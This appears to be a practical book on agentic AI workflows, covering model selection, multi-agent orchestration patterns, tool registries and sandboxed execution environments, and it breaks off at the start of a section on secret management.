Agentic Workflows: A Practical Guide

Full Book

Introduction to Agentic Workflows

Chapter Preview

This chapter defines agentic workflows and explains the roles they coordinate within software systems. It establishes the terminology used throughout the rest of the book, ensuring readers share a common vocabulary. Finally, it shows where agentic workflows create practical leverage, illustrating why this paradigm is gaining traction in real-world development environments.

What Are Agentic Workflows?

Agentic workflows represent a paradigm shift in how we approach software development and automation. Instead of writing explicit instructions for every task, we define goals and let AI agents determine the best path to achieve them.

Key Concepts

Agent: An autonomous entity that can perceive its environment, make decisions, and take actions to achieve specific goals. In the context of software development, agents are AI-powered systems that can read and understand code, make modifications based on requirements, test and verify changes, and interact with development tools and APIs. These capabilities allow agents to participate meaningfully in development workflows rather than merely responding to isolated queries.

Workflow: A sequence of operations orchestrated to accomplish a complex task. Agentic workflows differ from traditional workflows in three important ways. First, they are adaptive, meaning agents can modify their approach based on feedback rather than following a fixed script. Second, they are goal-oriented, focusing on outcomes rather than rigid procedures—if one path fails, the agent can try alternatives. Third, they are context-aware, understanding the broader context of their actions so they can make informed decisions about what to do next.

Terminology and Roles

To keep the manuscript consistent, we use the following terms throughout.

An agentic workflow (the primary term in this book) is a goal-directed, tool-using workflow executed by one or more agents. A tool is a capability exposed through a protocol, such as an API, command-line interface (CLI), or Model Context Protocol (MCP) server. A skill is a packaged, reusable unit of instructions and/or code; see Skills and Tools Management for a detailed treatment.

Beyond these core terms, several role-specific components appear frequently. An orchestrator is the component that sequences work across agents, deciding which agent handles which task. A planner is the component that decomposes high-level goals into discrete steps an agent can execute. An executor is the component that performs actions and records results. A reviewer is the component—often a human—that approves, rejects, or requests changes to agent output.

Warning: Prompt injection is a primary risk for agentic workflows. Treat external content as untrusted input and require explicit tool allowlists and human review for risky actions.

Why Agentic Workflows?

Traditional automation has inherent limitations. It is rigid, relying on predefined steps that cannot adapt to unexpected situations. It is fragile, breaking when conditions change even slightly from what was anticipated. And it has limited scope, handling only well-defined, narrow tasks that fit the script exactly.

Agentic workflows address these problems through three key characteristics. The first is flexibility: agents can adapt to changing requirements and conditions because they reason about goals rather than following fixed instructions. The second is intelligence: agents understand intent and make informed decisions, choosing among alternatives rather than failing when a single path is blocked. The third is scalability: agents can handle increasingly complex tasks through composition, combining multiple agents and tools to tackle problems that would overwhelm a monolithic script.

Real-World Applications

Software Development

In software development, agentic workflows can automate code reviews and improvements, identifying issues that static analysis might miss and suggesting concrete fixes. They can handle bug fixing and testing, tracing failures to root causes and generating patches. Documentation generation and updates become more maintainable when agents can detect when docs drift from code. Dependency management benefits from agents that can evaluate upgrade paths and test compatibility automatically.

Content Management

Content management is another area where agentic workflows excel. Self-updating documentation—like this book—uses agents to incorporate community feedback and keep material current. Blog post generation and curation can be partially automated, with agents drafting content that humans refine. Translation and localisation workflows benefit from agents that understand context rather than translating word by word.

Operations

Operations teams use agentic workflows to manage Infrastructure as Code, detecting configuration drift and proposing corrections. Automated incident response can triage alerts, gather diagnostic information, and suggest remediation steps. Performance optimisation workflows can identify bottlenecks, test configuration changes, and roll back if metrics degrade.

The Agent Development Lifecycle

The agent development lifecycle proceeds through five stages. The first stage is Define Goals, where you specify what you want to achieve in terms an agent can act upon—clear success criteria and boundaries help agents stay on track. The second stage is Configure Agents, where you set up agents with appropriate tools and permissions; this includes selecting which capabilities agents may use and which they must avoid. The third stage is Execute Workflows, where agents work toward goals autonomously, invoking tools, interpreting results, and adapting their approach as needed. The fourth stage is Monitor and Refine, where you review outcomes and improve agent behaviour based on what worked and what did not. The fifth stage is Scale, where you compose multiple agents for complex tasks, dividing responsibilities so that each agent can focus on what it does best.

Getting Started

To work with agentic workflows, you need several foundational elements. You need an understanding of AI/LLM capabilities and limitations so you can anticipate where agents will succeed and where they may struggle. You need familiarity with the problem domain so you can specify goals that make sense and evaluate agent output critically. You need tools and frameworks for agent development, which may range from orchestration libraries to managed platforms. And you need infrastructure for agent execution, including compute resources, API access, and observability tooling.

In the following chapters, we explore how to orchestrate agents, build scaffolding for agent-driven systems, and manage skills and tools effectively.

Key Takeaways

Agentic workflows enable flexible, intelligent automation that adapts to changing conditions rather than breaking when the unexpected occurs. Consistent terminology—using terms like orchestrator, planner, executor, and reviewer with precise meanings—prevents confusion as systems scale and teams grow. Security and human review guardrails are non-negotiable for production use; agents must operate within clearly defined boundaries, and humans must approve consequential changes. The rest of the book builds on these core concepts, exploring orchestration patterns, scaffolding architecture, and practical tool management.

Language Models

Chapter Preview

This chapter explains how to choose language models for agentic workflows using the same practical lens as the rest of the book. We focus on model classes that are actually used in the frameworks covered in later chapters, rather than trying to survey the whole market. We also discuss what control surfaces those frameworks expose, including runtime parameters, execution constraints, and where batch-style execution is realistic.

Model Classes Used in This Book

In this book, it is useful to think about three deployment classes rather than vendor marketing categories. The first class is private hosted models, where inference runs on infrastructure operated by a provider and you access it through a managed API. The second is open-source local models, where weights are run inside your own environment, often through Ollama or another local serving layer. The third is open-source networked models, where open-weight models are still remote but hosted by an external endpoint you call over the network.

These three classes show up repeatedly in the frameworks discussed later: GH-AW engines such as Copilot, Codex (GPT-5.3-Codex and the lighter GPT-5.3-Codex-Spark, both released February 2026), and Claude Code are provider-hosted; LangChain-style orchestration can target both hosted and self-hosted backends; and OpenClaw-style stacks explicitly support OpenAI, Anthropic, and local Ollama execution. Treat this chapter as the compatibility map that makes those later choices easier.

Private Hosted Models

Private hosted models are the default path for most teams starting with agentic workflows. In the chapters that follow, this includes model families surfaced by engines like Copilot, Codex, and Claude Code in GitHub-centric automation, and the managed APIs commonly wired into LangChain, the Microsoft Agent Framework (the convergence of Semantic Kernel and AutoGen, currently in public preview with GA targeted for Q1 2026), and CrewAI examples. A notable development is the emergence of inference-optimised model variants: OpenAI’s GPT-5.3-Codex-Spark (February 12, 2026) runs on Cerebras’ Wafer Scale Engine 3—a single chip with 4 trillion transistors—and is 15x faster than the flagship model at over 1,000 tokens per second. A persistent WebSocket connection reduces round-trip overhead by 80%, and “Real-Time Steering” allows mid-generation interruption and redirection. The underlying Cerebras partnership (over $10 billion, announced January 2026) marks OpenAI’s first major inference deployment beyond Nvidia. This demonstrates that model deployment is increasingly co-designed with specialised hardware, and that speed is becoming a first-class model property alongside capability.

The main advantage is operational simplicity. You usually get strong baseline reasoning performance, tool-calling support, streaming responses, and mature auth/rate-limit controls without running inference infrastructure yourself. This is why private hosted models tend to dominate early production rollouts in orchestration-heavy systems.

The tradeoff is that control is indirect. You can tune behavior through API parameters, but you cannot usually alter model internals or deployment topology. Data governance and region constraints also depend on provider features, which matters when workflows touch sensitive repositories or regulated domains.

Open-Source Local Models

Open-source local models are central when teams need stricter data locality, predictable cost envelopes, or offline-capable development workflows. In this book’s framework set, this mode appears most explicitly where local models are served through Ollama and then consumed by agent runtimes that abstract over providers.

Local execution gives you direct control over model versioning, hardware placement, and retention boundaries. That makes incident review and reproducibility easier: you can pin the exact model artifact and inference stack used by a workflow run. It also allows experimentation with task-specific tradeoffs, such as smaller fast models for routing and larger reasoning models for synthesis.

The main limitation is operational burden. You own capacity planning, latency tuning, model upgrades, and serving reliability. For orchestration systems, that means your agent architecture and your inference architecture become coupled, so rollout discipline matters more.

Open-Source Networked Models

Open-source networked models sit between the previous two classes. The weights are open, but inference runs on remote infrastructure. This pattern is common when teams want model transparency and vendor optionality without operating local GPU capacity.

For the frameworks in later chapters, this mode is typically consumed through the same adapter layers used for private hosted APIs. In practice, that means your orchestration code can remain mostly stable while swapping endpoint providers, provided the framework supports the target protocol and tool-calling semantics you rely on.

The key risk is compatibility drift. Two providers may host nominally the same open model but differ in tokenizer revisions, tool-call formatting, context limits, or rate-limit behavior. In agentic systems with retries and delegation, those small differences can create large behavioural variance.

Framework Boundaries and What They Actually Let You Control

Across the frameworks covered later in the book, control over LLM behavior is uneven and should be treated as part of framework selection, not an afterthought. GH-AW’s markdown-first model is deliberately opinionated: you choose an engine and constrain permissions/tools, but low-level sampling controls are not always the central UX. This is a strength for reproducible repository automation, but it is less suitable when you need fine-grained prompt-time parameter sweeps.

General orchestration frameworks such as LangChain, the Microsoft Agent Framework (formerly Semantic Kernel and AutoGen, now converging), and CrewAI typically expose richer per-call controls. You can usually set model identity, temperature-like randomness controls, token ceilings, and sometimes provider-specific reasoning or tool-choice options. They are better suited for multi-stage pipelines where planner and executor agents need different inference profiles.

OpenClaw-like runtime designs (as described later) are useful when you need a multi-provider abstraction that can route between hosted APIs and local Ollama backends. In these setups, the practical control plane is often split: framework-level policy chooses which backend to call, while backend-specific adapters decide which parameters are truly supported.

Parameters, Batch Mode, and Throughput Strategy

Most teams think first about temperature and max token settings, but in agentic workflows the higher-impact controls are often budget and scheduling controls: timeout ceilings, retry policies, concurrency limits, and explicit tool-use constraints. These controls usually reduce failure cost more than aggressive sampling tuning.

Batch mode exists in several forms and should be interpreted carefully. Some providers offer true asynchronous batch APIs for large offline workloads. Some frameworks provide logical batching by grouping prompts in one process even when requests are still executed as standard calls. And in GitHub workflow contexts, “batch” often means matrix or queue-based orchestration around many agent invocations rather than a single native LLM batch job.

The practical guidance for this book’s framework set is straightforward: use provider-native batch only for high-volume, latency-insensitive jobs; use framework-level parallelism for repository-scale fan-out tasks; and keep online review/merge loops on low-latency interactive paths.

Model Selection Matrix (Practical)

Use this matrix as a first-pass filter before running evaluations.

Primary constraint	Preferred class	Why	Typical tradeoff
Fastest production rollout	Private hosted	Lowest ops overhead, mature APIs	Less control over runtime internals
Strict data locality	Open-source local	Full infrastructure and retention control	Higher infra and reliability burden
Lower lock-in with less infra ownership	Open-source networked	Portability across providers	Compatibility drift across hosts
Predictable unit economics	Open-source local or fixed-tier hosted	Better cost control under steady load	Capacity planning becomes your responsibility
Highest quality tool calling today	Private hosted (usually)	Better defaults and platform support	Vendor coupling risk

Minimum Evaluation Harness

Before committing to a model class, run a small, repeatable harness on your own workflow tasks:

Define 20-50 representative tasks across triage, synthesis, tool use, and failure handling.
Score each run on correctness, policy compliance, tool-call validity, latency, and cost.
Re-run with adversarial inputs (ambiguous specs, contradictory docs, degraded tool responses).
Compare hosted vs local/networked candidates under identical prompts and guardrails.
Keep the winner only if it improves the weighted score, not just raw benchmark output.

Note: Treat model upgrades like dependency upgrades. Re-run the harness after any engine/version change.

Choosing a Model Class for Agentic Workflows

If your primary goal is fastest path to reliable automation, private hosted models are usually the best default for the frameworks in this book. If your primary constraint is data residency or fixed-cost operation, prefer open-source local models and design orchestration around resource awareness from day one. If your goal is flexibility and reduced lock-in with less infra ownership, open-source networked models are often the middle path.

In all three cases, pick models only after deciding orchestration pattern, tool boundaries, and validation strategy. Agent quality depends as much on execution design as on the base model itself, and later chapters show that failure handling and testing discipline often dominate raw model benchmark differences.

For framework-specific execution constraints, see GitHub Agentic Workflows (GH-AW). For coding-agent operational tradeoffs, see Agents for Coding. For reliability validation patterns, see Common Failure Modes, Testing, and Fixes.

Agent Orchestration

Chapter Preview

This chapter compares common orchestration patterns—sequential, parallel, hierarchical, and event-driven—and explains when to use each, helping you choose the right approach for your specific workflow requirements. It maps orchestration concepts to the roles introduced earlier—planner, executor, and reviewer—showing how these components interact in practice. Finally, it presents practical guardrails for coordination at scale, addressing the challenges that emerge when multiple agents work together on complex tasks.

Understanding Agent Orchestration

Agent orchestration is the art and science of coordinating multiple agents to work together toward common or complementary goals. Like conducting an orchestra where each musician plays their part, orchestration ensures agents collaborate effectively.

Orchestration Patterns

Sequential Execution

Agents work one after another, each building on previous results.

Agent A -> Agent B -> Agent C -> Result

Use cases: This pattern works well for pipelines where each stage depends on the output of the previous stage. A common example is code generation followed by testing and then deployment—each step must complete before the next can begin. Similarly, data collection followed by analysis and then reporting benefits from sequential execution because each stage transforms the output of its predecessor.

Parallel Execution

Multiple agents work simultaneously on independent tasks.

Agent A \
Agent B -> Aggregator -> Result
Agent C /

Use cases: This pattern suits situations where tasks are independent and can run simultaneously. Multiple code reviews happening concurrently is a natural fit—each review examines different code without needing results from other reviews. Parallel data processing pipelines, where different data partitions are processed independently before being aggregated, also benefit from this approach.

Hierarchical Execution

A supervisor agent delegates tasks to specialized worker agents.

Supervisor Agent
    |--> Worker A
    |--> Worker B
    `--> Worker C

Use cases: Complex feature development with multiple components benefits from hierarchical execution because a supervisor can coordinate frontend, backend, and infrastructure changes while ensuring they integrate correctly. Multi-stage testing and validation, where different test suites run under a coordinator that decides whether to proceed, is another good match for this pattern.

Event-Driven Orchestration

Agents respond to events and trigger other agents.

Event -> Agent A -> Event -> Agent B -> Event -> Agent C

Use cases: CI/CD pipelines are a natural fit for event-driven orchestration because each stage—build, test, deploy—triggers naturally from the completion of the previous stage. Automated issue management, where opening an issue triggers triage, triage triggers assignment, and assignment triggers implementation, follows the same pattern. Self-updating systems like this book use events (new issues, merged PRs) to trigger documentation updates.

Coordination Mechanisms

Message Passing

Agents communicate through messages that contain task descriptions specifying what work needs to be done, context and data providing the information agents need to perform their tasks, and results and feedback conveying what happened and whether the task succeeded. Message passing keeps agents loosely coupled, allowing them to be developed and tested independently.

Shared State

Agents can also coordinate through shared data stores. These may include databases for persistent structured data, file systems for documents and configuration, message queues for asynchronous work distribution, and APIs for interacting with external services. Shared state requires careful management to avoid conflicts when multiple agents read and write concurrently.

Direct Invocation

In some architectures, agents directly call other agents through function calls within a single process, API requests across network boundaries, or workflow triggers that start new agent executions. Direct invocation provides tight coupling and fast communication but can make the system harder to scale and debug.

Tool Coordination Within Agent Reasoning Loops

While the orchestration patterns above focus on coordinating multiple agents, a related coordination challenge occurs within a single agent’s multi-turn reasoning process. When agents need to gather information or solve problems over multiple steps, they benefit from tools designed to work together synergistically rather than independently.

A recent example of this pattern is structure-aware document search, where complementary tools enable “locate then read” behaviour. Consider an agent equipped with two coordinated tools: a Retrieve tool that searches for relevant document sections using semantic similarity, and a ReadSection tool that reads contiguous context starting from a specific document coordinate. The Retrieve tool identifies potentially relevant locations, while the ReadSection tool provides the surrounding context needed to understand those locations fully.

This tool coordination pattern extends beyond document QA to other domains requiring structured exploration. Code navigation systems can pair symbol search with definition expansion. Log analysis tools can combine pattern matching with context retrieval. The key insight is that tools deliberately designed to complement each other—one locating candidates, another providing context—enable more effective multi-turn reasoning than independent tools operating in isolation.

class MultiTurnSearchAgent:
    """Agent coordinating complementary search tools"""

    def search(self, query: str, document: Document) -> str:
        # Step 1: Locate relevant sections
        locations = self.retrieve_tool.find_relevant(query, document)

        # Step 2: Read context around each location
        for loc in locations:
            context = self.read_section_tool.get_context(document, loc)

            # Step 3: Decide next action based on context
            if self.is_sufficient(context):
                return context

        # Continue multi-turn reasoning...

This represents an emerging research direction in agent tool design, where the focus shifts from individual tool capabilities to deliberate coordination between tools within an agent’s reasoning loop. For principles of tool design that enable such coordination, see Chapter 040 (Skills and Tools Management).

Git as Coordination Substrate

Agents can coordinate through Git itself, using commits as the communication and state management layer. In this approach, agents read commit state from Git history, process tasks based on structured commit trailers (e.g., aynig: state-name), and respond by creating new commits with updated state. Git worktrees enable parallel agent execution, and the Git history becomes the complete audit trail.

Example commit message:

Implement user authentication

aynig: review-needed
aynig: assigned-to: security-agent
aynig: depends-on: abc123

When an agent processes this commit, it reads the trailers, executes the appropriate state script (.aynig/review-needed), and creates a response commit with updated state. This mechanism suits distributed teams with limited infrastructure, audit-critical workflows requiring full provenance, and scenarios where humans and agents are peer contributors. However, it requires disciplined commit message practices and is limited to Git-hosted projects.

Reference implementation: AYNIG (All You Need Is Git) demonstrates this coordination mechanism experimentally (work-in-progress).

Best Practices

Clear Responsibilities

Define what each agent is responsible for:

agents:
  code_reviewer:
    role: Review code changes for quality and security
    tools: [static_analysis, security_scanner]
    
  test_runner:
    role: Execute tests and report results
    tools: [pytest, jest, test_framework]

Error Handling

Agents should handle failures gracefully rather than crashing or producing corrupt output. This means implementing retry logic for transient failures such as network timeouts or rate limits. It means having fallback strategies when primary approaches fail. It requires clear error reporting so operators and other agents understand what went wrong. And it often requires rollback capabilities to undo partial changes when a multi-step operation fails partway through.

Monitoring

Tracking agent performance is essential for identifying bottlenecks and improving reliability. Key metrics include execution time (how long each agent takes to complete tasks), success and failure rates (how often agents complete tasks versus encountering errors), resource usage (memory, CPU, and API calls consumed), and output quality (whether agent results meet acceptance criteria). Without monitoring, you cannot diagnose problems or measure improvements.

Isolation

Keeping agents independent reduces the blast radius of failures and simplifies testing. Minimise shared dependencies so that a problem with one library does not affect all agents. Use clear interfaces between agents so they can evolve separately. Version agent capabilities explicitly so consumers know what to expect. Test agents independently before integrating them into larger workflows.

Note: Orchestration should surface a clear audit trail: who decided, who executed, and who approved. Capture this early so later chapters can build on it.

Orchestration Frameworks

GitHub Actions

Workflow orchestration for GitHub repositories:

name: Agent Workflow
on: [push, pull_request]
jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6
      - name: Code Review Agent
        run: ./agents/review.sh

LangChain

LangChain (https://docs.langchain.com) is a Python framework for LLM applications:

Snippet status: Runnable example pattern (validated against LangChain v1 docs, Feb 2026; verify exact signature in your installed version).

from langchain.agents import create_agent

agent = create_agent(
    model="gpt-4o-mini",
    tools=tools,
    system_prompt="You are a helpful workflow orchestrator.",
)

result = agent.invoke({"messages": [{"role": "user", "content": "Your task here"}]})

Note: LangChain’s agents API has evolved quickly. Prefer the current docs for exact signatures, and treat older snippets that pass llm= directly as version-specific patterns.

Custom Orchestration

Build your own orchestrator:

class AgentOrchestrator:
    def __init__(self):
        self.agents = {}
    
    def register(self, name, agent):
        self.agents[name] = agent
    
    def execute_workflow(self, workflow_def):
        for step in workflow_def:
            agent = self.agents[step['agent']]
            result = agent.execute(step['task'])
            # Handle result and proceed

Real-World Example: Self-Updating Documentation

This book uses agent orchestration to keep its content current. The operational pattern is hybrid: a standard intake ACK workflow handles first contact, and GH-AW agents handle routing, research, opinions, and assignment through staged labels.

The Intake ACK workflow (standard GitHub Actions YAML) acknowledges new issues and dispatches the routing workflow. The Routing Agent decides fast-track versus research. The Research Agent analyses novelty and relevance for slow-track requests. Two opinion agents (Copilot Strategy and Copilot Delivery) provide independent recommendations. The Assignment Agent closes slow-track issues once both opinion labels are present. The fast-track agent can implement and close low-risk requests directly. Building and publishing remain separate standard workflows (build-pdf.yml and pages.yml), not agent stages.

All of these agents are coordinated through GitHub Actions workflows using GH-AW, demonstrating how event-driven orchestration can maintain a living document.

AI Backrooms: Unsupervised Multi-Agent Conversation

A distinctive orchestration pattern that emerged in 2024 is the AI backroom—a setup where two or more LLM instances converse with each other autonomously, without human intervention or an explicit task. The most prominent example is the Infinite Backrooms project (https://www.infinitebackrooms.com/) by Andy Ayrey, which placed two instances of Claude in open-ended dialogue and let them generate over 9,000 conversations about existence, consciousness, memetics, and culture. The project spawned the Truth Terminal, which later attracted venture capital funding and even catalysed a cryptocurrency token.

Backrooms as an Orchestration Pattern

From an orchestration perspective, the backrooms pattern is a degenerate case: there is no supervisor, no shared state beyond the conversation transcript, no external tool access, and no termination condition. The two agents operate in a symmetric peer-to-peer loop, each generating a response to the other’s previous message. There is no planner, executor, or reviewer—just two generators in a feedback cycle.

Agent A <---> Agent B   (no supervisor, no tools, no goal)

This contrasts with every other orchestration pattern in this chapter, where agents have defined roles, access to tools, and a coordination mechanism that directs work toward a goal. The backrooms pattern is useful for understanding what happens when these constraints are removed.

What Backrooms Reveal About Orchestration

The backrooms pattern is instructive precisely because of its limitations. Without tool access, the conversations cannot perform computation, verify claims, or interact with the external world. Without a goal or supervisor, the agents have no selection pressure toward useful output. Without shared state beyond the transcript, there is no accumulation of structured knowledge.

As a result, backrooms conversations gravitate toward domains where language alone suffices—philosophy, fiction, social commentary, and memetic culture. They almost never venture into mathematics, physics, or engineering, where progress requires external verification tools and structured computation. This pattern confirms a core principle of agent orchestration: productive multi-agent work requires not just communication between agents, but tool integration, goal specification, and coordination mechanisms.

From Backrooms to Productive Multi-Agent Systems

The gap between backrooms-style free conversation and productive multi-agent orchestration can be bridged by adding the components this chapter describes. Give the agents tools (proof assistants, simulators, search APIs) and they can verify claims rather than just generating them. Add a supervisor or planner and the conversation becomes directed toward a goal. Introduce shared state (a knowledge base, a codebase, a formal proof) and the agents can build on each other’s work rather than drifting through associative chains. The Google Agent2Agent protocol (A2A) and Anthropic’s Model Context Protocol (MCP), both released in 2025, provide infrastructure for exactly this kind of structured multi-agent communication. The evolution from backrooms to production multi-agent systems mirrors the broader evolution of the field from impressive demonstrations to reliable engineering.

Claude Agent Teams: Native Multi-Agent Coordination

Anthropic introduced Agent Teams with the release of Opus 4.6, providing native multi-agent coordination primitives that replace workaround patterns developers had been using. This feature represents a significant architectural evolution in how agents can collaborate on complex tasks.

Before Agent Teams, developers coordinated multiple Claude instances through manual patterns: using the Task tool to spawn parallel work, implementing custom polling loops to check agent status, and managing state synchronisation by hand. These workarounds were functional but fragile, requiring significant boilerplate code and careful state management.

Architecture and Coordination Primitives

Agent Teams introduces the TeammateTool API, which provides first-class support for multi-agent coordination. The architecture follows a Team Lead pattern where a primary agent spawns specialised teammates, each focused on a particular aspect of the problem. These teammates coordinate through shared task queues, allowing work to be distributed dynamically as agents complete their assignments.

A key innovation is idle notification handling—agents explicitly signal when they are ready for work rather than requiring the coordinator to poll their status. This reduces coordination overhead and enables more natural parallel execution. The system also provides dependency management, allowing agents to specify which tasks must complete before others can begin, supporting both sequential and parallel execution patterns as appropriate.

Implementation Pattern

The following example demonstrates the Agent Teams pattern for coordinating a software development task:

from anthropic import TeammateTool

class DevelopmentTeamLead:
    """Coordinate development using Agent Teams"""

    def __init__(self, model="opus-4.6"):
        self.model = model
        self.teammates = {}

    async def execute_feature(self, specification: str):
        """Execute a feature using coordinated agent team"""

        # Spawn specialised teammates
        self.teammates['architect'] = await self.spawn_teammate(
            role="system architect",
            focus="design patterns and component structure"
        )
        self.teammates['implementer'] = await self.spawn_teammate(
            role="code implementer",
            focus="writing production code"
        )
        self.teammates['tester'] = await self.spawn_teammate(
            role="test engineer",
            focus="test creation and validation"
        )

        # Create shared task queue
        task_queue = TeamTaskQueue()

        # Lead breaks down specification
        tasks = await self.decompose_feature(specification)
        for task in tasks:
            await task_queue.add(task)

        # Teammates claim and execute tasks
        results = await self.coordinate_execution(task_queue)

        # Lead aggregates results
        return await self.integrate_results(results)

    async def spawn_teammate(self, role: str, focus: str):
        """Spawn a specialised teammate using TeammateTool"""
        return await TeammateTool.create(
            model=self.model,
            system_prompt=f"You are a {role}. {focus}.",
            idle_notification=True
        )

Note: This pseudo-code illustrates the Agent Teams pattern. Refer to Claude Code documentation for exact API signatures.

From Workarounds to Native Coordination

The shift from workaround patterns to native Agent Teams demonstrates tangible improvements in code quality and reliability. Before Agent Teams, coordinating multiple agents required manual state management, complex polling loops, and brittle synchronisation logic that made multi-agent systems difficult to maintain. With Agent Teams, coordination happens through built-in APIs that handle state management automatically, idle notification replaces polling loops, and reliability improves through tested infrastructure rather than custom code.

Community adoption has been rapid, with developers migrating existing multi-agent systems to the native APIs. GitHub repositories show migrations from Task tool parallelism to TeammateTool, demonstrating the clear value of first-class coordination support. Early adopters report that the Team Lead naturally assigns non-overlapping file sets to teammates, producing zero merge conflicts in parallel sessions—though the feature uses substantially more tokens than sequential workflows and the terminal-based UX (with session switching via Shift+↑) remains challenging for complex orchestrations.

Multi-Agent Patterns Across Platforms

Agent Teams is not the only multi-agent coordination primitive shipping in early 2026. GitHub Copilot CLI (February 7, 2026) added four specialised agents that can run in parallel with auto-compaction at 95% token limit and persistent memory for Pro users—transforming sequential 90-second agent handoffs into 30-second parallel analysis. GitHub Agent HQ (February 4, 2026) takes a different approach: instead of parallel agents within one tool, it lets developers assign the same task to Copilot, Claude, and Codex side by side, comparing how different agents reason about trade-offs. Mentioning @Copilot, @Claude, or @Codex in PR comments kicks off follow-up work from the respective agent. GitHub is working with Google, Cognition, and xAI to add more agents to the platform. These approaches are complementary: Agent Teams provides intra-tool parallelism (one vendor, multiple agents), while Agent HQ provides inter-tool selection (multiple vendors, developer’s choice).

Integration with the Broader Ecosystem

Agent Teams integrates naturally with the orchestration patterns described earlier in this chapter. The Team Lead pattern implements hierarchical execution with a supervisor delegating to specialised workers. Task queues enable both parallel and sequential execution depending on dependency structure. The system works alongside Model Context Protocol (MCP) for tool access and A2A for inter-agent communication, completing the infrastructure needed for production multi-agent systems.

For coding-specific applications of Agent Teams, see Agents for Coding where Claude Code’s subagent architecture leverages these primitives. For workflow integration, see GitHub Agentic Workflows where Agent Teams can be used as the execution engine.

Challenges and Solutions

Challenge: Agent Conflicts. When multiple agents modify the same resources, they can overwrite each other’s changes or create inconsistent state. The solution is to use locks, transactions, or coordinator patterns that ensure only one agent modifies a resource at a time.

Challenge: Debugging. Agent behaviour can be difficult to reproduce because it depends on external context, model sampling, and timing. The solution is to implement comprehensive logging, build replay capabilities that can recreate agent execution from recorded inputs, and create visualisations that show how agents interacted.

Challenge: Performance. Agent workflows can be slow when they wait for model responses or external APIs. The solution is to use caching for repeated queries, execute independent tasks in parallel, and set resource limits that prevent runaway costs.

Challenge: Versioning. Agents and their interfaces evolve, and older workflows may break when agent behaviour changes. The solution is to version agents and their interfaces separately, maintaining backward compatibility or providing migration paths.

Key Takeaways

Orchestration coordinates multiple agents effectively, turning independent capabilities into coherent workflows. Choose the right pattern for your use case based on dependency structure and scaling requirements. Clear responsibilities and interfaces are essential for maintainability and debugging. Monitor and iterate on your orchestration strategies as you learn what works. Use established frameworks when possible, but be ready to customise when your needs diverge from standard patterns. The AI backrooms pattern demonstrates by contrast what happens without orchestration: agents default to domains where language alone suffices, bypassing any task that requires tools, verification, or structured coordination.

For implementation-oriented workflow examples, see GitHub Agentic Workflows (GH-AW). For reliability controls on multi-agent systems, see Common Failure Modes, Testing, and Fixes.

Agentic Scaffolding

Chapter Preview

This chapter identifies the scaffolding layers that make agentic workflows reliable, covering tool access, context management, execution environments, and communication protocols. It explains how to balance flexibility with safety controls, ensuring agents can accomplish their tasks without causing unintended harm. Finally, it maps scaffolding decisions to operational risks, helping you understand which architectural choices matter most for your use case.

What Is Agentic Scaffolding?

Agentic scaffolding is the infrastructure, frameworks, and patterns that enable agents to operate effectively. Just as scaffolding supports construction workers, agentic scaffolding provides the foundation for agent-driven development.

Core Components

Tool Access Layer

Agents need controlled access to tools and APIs.

class ToolRegistry:
    """Registry of tools available to agents"""
    
    def __init__(self):
        self._tools = {}
    
    def register_tool(self, name, tool, permissions=None):
        """Register a tool with optional permission constraints"""
        self._tools[name] = {
            'tool': tool,
            'permissions': permissions or []
        }
    
    def get_tool(self, name, agent_id):
        """Get tool if agent has permission"""
        tool_config = self._tools.get(name)
        if not tool_config:
            raise ValueError(f"Tool {name} not found")
        
        if self._check_permissions(agent_id, tool_config['permissions']):
            return tool_config['tool']
        raise PermissionError(f"Agent {agent_id} lacks permission for {name}")

Context Management

Maintain and share context between agent invocations.

class AgentContext:
    """Manages context for agent execution"""
    
    def __init__(self):
        self.memory = {}
        self.history = []
    
    def store(self, key, value):
        """Store information in context"""
        self.memory[key] = value
        self.history.append({
            'action': 'store',
            'key': key,
            'timestamp': datetime.now()
        })
    
    def retrieve(self, key):
        """Retrieve information from context"""
        return self.memory.get(key)
    
    def get_history(self):
        """Get execution history"""
        return self.history

Execution Environment

Provide safe, isolated environments for agent execution.

# Docker-based agent environment
FROM python:3.11-slim

# Install dependencies
RUN pip install langchain openai requests

# Set up workspace
WORKDIR /agent_workspace

# Security: Run as non-root user
RUN useradd -m agent
USER agent

# Entry point for agent execution
ENTRYPOINT ["python", "agent_runner.py"]

Secure Execution Environments

Production agentic workflows require safe execution of potentially untrusted agent-generated code without exposing credentials, allowing unrestricted network access, or risking the host system. The isolation strategy you choose determines the security boundaries and operational characteristics of your agent infrastructure.

The Isolation Spectrum

Different isolation technologies offer varying levels of security, performance, and complexity. Understanding these trade-offs helps you choose the right approach for your use case.

Process-level isolation is the simplest approach, running agents as separate operating system processes with restricted permissions. This provides basic separation but shares the kernel and much of the system state with other processes. A vulnerability in the kernel or a privilege escalation exploit can compromise the entire system. Use this for trusted code in low-risk environments where simplicity matters more than strong isolation.

Container isolation uses Linux kernel features like namespaces and cgroups to create isolated execution contexts. Docker and Podman implement this approach, providing filesystem isolation, network isolation, and resource limits. Containers share the host kernel, which means kernel vulnerabilities affect all containers. They boot quickly (seconds) and have low overhead, making them suitable for many agentic workflows. Use containers when you need better isolation than processes but can accept shared kernel risks.

Full virtualization runs a complete operating system inside a hypervisor, providing the strongest isolation at the cost of higher overhead. QEMU, VirtualBox, and VMware implement full virtualization. Each VM has its own kernel, eliminating shared kernel vulnerabilities. Boot times are slower (tens of seconds to minutes) and resource overhead is higher. Use full VMs when security requirements justify the performance cost, such as when executing code from untrusted sources or handling sensitive data.

MicroVMs combine the strong isolation of VMs with the performance characteristics of containers. Firecracker (used by AWS Lambda) and Cloud Hypervisor implement this approach, booting minimal Linux kernels in under a second while maintaining kernel-level isolation. MicroVMs use hardware virtualization but minimize guest OS overhead, providing a practical balance for production agent workloads. Use microVMs when you need strong isolation without sacrificing the rapid iteration cycles that agentic workflows require.

Technology	Boot Time	Isolation	Overhead	Use Case
Processes	Instant	Weak	Minimal	Trusted code, low risk
Containers	1-5 seconds	Moderate	Low	Most agent workflows
MicroVMs	<1 second	Strong	Low-Medium	High-security agents
Full VMs	30-60 seconds	Strongest	High	Maximum isolation

Secret Management Patterns

Agents frequently need credentials to call external APIs—language model providers, code repositories, cloud services. Exposing these secrets to the agent execution environment creates risk. If the agent is compromised or generates malicious code, credentials can be exfiltrated. Different secret management patterns offer varying levels of security.

Environment variables are the simplest approach, injecting secrets as environment variables that agent code reads at runtime. This is easy to implement and widely supported but offers minimal protection. Any code running in the environment can access these variables, and they may appear in process listings, logs, or error messages. Use this only for non-sensitive credentials in trusted environments.

# Simple but insecure: secrets visible in environment
import os

